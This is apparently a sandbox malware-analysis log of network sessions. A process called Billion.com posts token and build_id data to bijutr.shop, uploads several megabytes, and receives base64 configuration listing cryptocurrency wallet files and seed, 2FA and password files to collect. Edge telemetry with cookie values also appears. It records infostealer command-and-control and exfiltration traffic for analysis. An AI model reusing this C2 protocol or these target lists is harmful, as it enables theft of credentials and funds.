                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:37 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-24 18:28:39 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Dec 2024 18:28:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-24 18:28:39 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.6 | 50062 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:39 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----XLFCJEUKXLNYM7G4E3W4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 6990993
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-24 18:28:39 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 58 4c 46 43 4a 45 55 4b 58 4c 4e 59 4d 37 47 34 45 33 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 58 4c 46 43 4a 45 55 4b 58 4c 4e 59 4d 37 47 34 45 33 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 58 4c 46 43 4a 45 55 4b 58 4c 4e 59 4d 37 47 34 45 33 57 34 0d 0a 43 6f 6e 74
Data Ascii: ------XLFCJEUKXLNYM7G4E3W4Content-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------XLFCJEUKXLNYM7G4E3W4Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------XLFCJEUKXLNYM7G4E3W4Cont
2024-12-24 18:28:46 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Dec 2024 18:28:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        42192.168.2.650071188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
Timestamp, Bytes transferred, Direction, Data
2024-12-24 18:28:41 UTC 323 OUT POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----M79RQ1VS0ZU3EUASJMGV
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
2024-12-24 18:28:41 UTC 331 OUT
                                                                                                                                                                                                                                                                                                        Data Ascii: ------M79RQ1VS0ZU3EUASJMGVContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------M79RQ1VS0ZU3EUASJMGVContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------M79RQ1VS0ZU3EUASJMGVCont
2024-12-24 18:28:42 UTC 158 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:41 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
2024-12-24 18:28:42 UTC 2228 IN
                                                                                                                                                                                                                                                                                                        Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        43192.168.2.65007420.189.173.24437060C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp, Bytes transferred, Direction, Data
2024-12-24 18:28:42 UTC 1071 OUT POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735064920167&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 11902
                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                        Cookie: USRLOC=; MUID=302665E99E416E3C182470B69FCB6F6B; _EDGE_S=F=1&SID=0DE3EBFAB5BE6BFF1F65FEA5B4FF6AFE; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
2024-12-24 18:28:42 UTC 11902 OUT
                                                                                                                                                                                                                                                                                                        Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-24T18:28:40.165Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"ef48d0ad-9eb0-4df3-bc6b-5c1231d923b9","epoch":"3601759707"},"app":{"locale
2024-12-24 18:28:43 UTC 890 IN HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                        P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                        Set-Cookie: MC1=GUID=5556440dd7f446ce8b2fb9e151d9af20&HASH=5556&LV=202412&V=4&LU=1735064923209; Domain=.microsoft.com; Expires=Wed, 24 Dec 2025 18:28:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                        Set-Cookie: MS0=140aea28f98b4297838400d2f698d2c2; Domain=.microsoft.com; Expires=Tue, 24 Dec 2024 18:58:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                        time-delta-millis: 3042
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:42 GMT
                                                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        44192.168.2.65007520.189.173.24437060C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp, Bytes transferred, Direction, Data
2024-12-24 18:28:42 UTC 1071 OUT POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735064920176&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 33279
                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                        Cookie: USRLOC=; MUID=302665E99E416E3C182470B69FCB6F6B; _EDGE_S=F=1&SID=0DE3EBFAB5BE6BFF1F65FEA5B4FF6AFE; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
2024-12-24 18:28:42 UTC | 16384 | OUT
                                                                                                                                                                                                                                                                                                        Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-24T18:28:40.174Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"ef48d0ad-9eb0-4df3-bc6b-5c1231d923b9","epoch":"3601759707"},"app":{"locale
2024-12-24 18:28:42 UTC | 16384 | OUT
                                                                                                                                                                                                                                                                                                        Data Ascii: Static":false,"name":"default","ocid":"msedgdhp","product":"anaheim","type":"dhp","url":"https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531&ocid=msedgdhp","viewType":"size3column","theme":"li
2024-12-24 18:28:42 UTC | 511 | OUT
                                                                                                                                                                                                                                                                                                        Data Ascii: n]/staticsb/statics/latest/brand/new-msn-logo-color-black.svg":{"type":"o","spans":{"network":[17061,350]},"durations":{"connect":13,"request":337,"cdnTCP":316,"cdnSelf":0,"cdnOrigin":0},"scalars":{"size":2070,"cache":0}},"[cdn]/staticsb/statics/latest/ic
2024-12-24 18:28:43 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                        P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                        Set-Cookie: MC1=GUID=60195b9e993d46eb8c10cac2c472a656&HASH=6019&LV=202412&V=4&LU=1735064923059; Domain=.microsoft.com; Expires=Wed, 24 Dec 2025 18:28:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                        Set-Cookie: MS0=cf7be54bb40d4fafafa79dd0a9085ce4; Domain=.microsoft.com; Expires=Tue, 24 Dec 2024 18:58:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                        time-delta-millis: 2883
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:42 GMT
                                                                                                                                                                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.6 | 50080 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:43 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----RQ9ZCBA1N7QQQI5XT0H4
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
2024-12-24 18:28:43 UTC | 331 | OUT
Data Ascii:
------RQ9ZCBA1N7QQQI5XT0H4
Content-Disposition: form-data; name="token"

259654c3bcc7330e1954cafd3454ec44
------RQ9ZCBA1N7QQQI5XT0H4
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------RQ9ZCBA1N7QQQI5XT0H4
Cont
2024-12-24 18:28:44 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:44 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
2024-12-24 18:28:44 UTC | 1524 | IN
                                                                                                                                                                                                                                                                                                        Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.6 | 50079 | 20.189.173.2 | 443 | 7060 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:43 UTC | 1060 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735064921021&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 5371
                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                        Cookie: USRLOC=; MUID=302665E99E416E3C182470B69FCB6F6B; _EDGE_S=F=1&SID=0DE3EBFAB5BE6BFF1F65FEA5B4FF6AFE; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
2024-12-24 18:28:43 UTC | 5371 | OUT
                                                                                                                                                                                                                                                                                                        Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-24T18:28:41.021Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"ef48d0ad-9eb0-4df3-bc6b-5c1231d923b9","epoch":"3601759707"},"app":{"locale
2024-12-24 18:28:44 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                        P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                        Set-Cookie: MC1=GUID=7cfa92acd35f4775b018ad71d4ae2aa0&HASH=7cfa&LV=202412&V=4&LU=1735064923993; Domain=.microsoft.com; Expires=Wed, 24 Dec 2025 18:28:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                        Set-Cookie: MS0=a0df12bcc0c74c40980250217acdef22; Domain=.microsoft.com; Expires=Tue, 24 Dec 2024 18:58:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                        time-delta-millis: 2972
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:43 GMT
                                                                                                                                                                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.6 | 50081 | 20.189.173.2 | 443 | 7060 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:43 UTC | 1060 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735064921170&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 9827
                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                        Cookie: USRLOC=; MUID=302665E99E416E3C182470B69FCB6F6B; _EDGE_S=F=1&SID=0DE3EBFAB5BE6BFF1F65FEA5B4FF6AFE; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
2024-12-24 18:28:43 UTC | 9827 | OUT | Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-24T18:28:41.169Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"ef48d0ad-9eb0-4df3-bc6b-5c1231d923b9","epoch":"3601759707"},"app":{"loc
2024-12-24 18:28:44 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                        P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                        Set-Cookie: MC1=GUID=dd9984778ef74de9a608d4fb2f9814a0&HASH=dd99&LV=202412&V=4&LU=1735064924588; Domain=.microsoft.com; Expires=Wed, 24 Dec 2025 18:28:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                        Set-Cookie: MS0=52f908f8da6942a7ab29715bd266243b; Domain=.microsoft.com; Expires=Tue, 24 Dec 2024 18:58:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                        time-delta-millis: 3418
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:44 GMT
                                                                                                                                                                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.6 | 50087 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:45 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----0ZUSR1VAI58QQI5XT2DJ
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 453
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
2024-12-24 18:28:45 UTC | 453 | OUT | Data Ascii:
------0ZUSR1VAI58QQI5XT2DJ
Content-Disposition: form-data; name="token"

259654c3bcc7330e1954cafd3454ec44
------0ZUSR1VAI58QQI5XT2DJ
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------0ZUSR1VAI58QQI5XT2DJ
Cont
2024-12-24 18:28:46 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:46 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
2024-12-24 18:28:46 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.6 | 50094 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:48 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----TJ5X4EUSR1NYMY5FC2VS
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 98329
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
2024-12-24 18:28:48 UTC | 16355 | OUT | Data Ascii:
